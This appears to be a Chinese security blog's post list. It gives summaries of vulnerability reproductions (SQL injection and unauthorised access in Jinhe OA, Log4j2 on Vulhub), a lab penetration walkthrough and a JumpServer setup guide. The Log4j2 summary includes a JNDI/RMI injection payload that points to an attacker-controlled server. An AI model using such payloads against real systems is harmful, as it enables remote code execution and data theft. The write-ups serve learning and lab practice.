- 博客(7)
- 收藏
- 关注
RSS订阅原创 漏洞复现-金和OA C6 GetHomeInfo SQL注入漏洞
金和网络是专业信息化服务商,为城市监管部门提供了互联网+监管解决方案,为企事业单位提供组织协同OA系统升开发平台,电子政务一体化平台智慧电商平合等服务。金和OA C6 GetHomeInfo接口处存在SQL注入漏洞,攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
2024-01-25 19:32:42
319
原创 Vulhub靶场-Log4j2
当日志中包含 ${},lookup就会去解析括号里面的内容,如:攻击payload:${jndi:rmi:192.168.96.1:1099/wqiyua}当lookup解析到jndi时,就会调用jndi并利用rmi,执行攻击机jndi服务下的class文件并执行,从而造成任意命令执行漏洞
2024-01-24 19:40:45
1072
1
原创 漏洞复现-金和OA SAP_B1Config.aspx未授权访问漏洞
金和QA办公系统是.款集合了办公自动化协同办公工作流管理等功能的企业级管理软件。金和OA办公系统提供了多个模块,包括日程管理、文件管理、邮件管理、人事管理、客户管理、项目管理等。用户可以根据自己的需求选择需要的模块进行使用。该系统存在未授权访问漏洞,攻击者可通过此漏洞获取数据库的账户密码等敏感信息。
2024-01-10 19:16:36
394
原创 AI WEB 1.0靶场渗透思路
12.跑出了两个表的名称,但是表内没有我们想要的数据,因为我们目录扫描的时候,没有扫描出后台的登录页面,所以说获取到账号密码也是没有用的,我们可以想到之前我们获取到了一个phpinfo的页面,存在路径,我们就去尝试获取shell。3.我们可以看到扫出两个目录,我们去访问一下,第一个/index.html什么都没有,我们访问第二个/robots.txt,可以发现/robots.txt下面显示还有目录,我们接着去访问。7.我们发现是一个phpinfo的网页,但是我们可以获取到有用的信息,比如IP地址和路径。
2023-07-25 11:54:19
359
原创 安装JumpServer堡垒机以及使用
用户组是用于资产授权,当某个资产对一个用户组授权后,这个用户组下面所有用户都可以使用这个资产。使用admin用户登录jumpserver,添加节点,节点不能重名,右击节点可以添加、删除和重命名节点,以及进行资产相关的操作。注:查看操作历史点击左上角的切换,切换到审计台,点击会话审计,在里面就可以查看操作记录。点击奇迹暖暖-服务器这个节点,点击创建的11服务器 等待一会就会连接成功。再次登录,使用新修改的密码进入,进去的页面是这样的。点击用户管理---查看用户组---添加用户组。
2023-03-31 14:32:55
1137
1
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人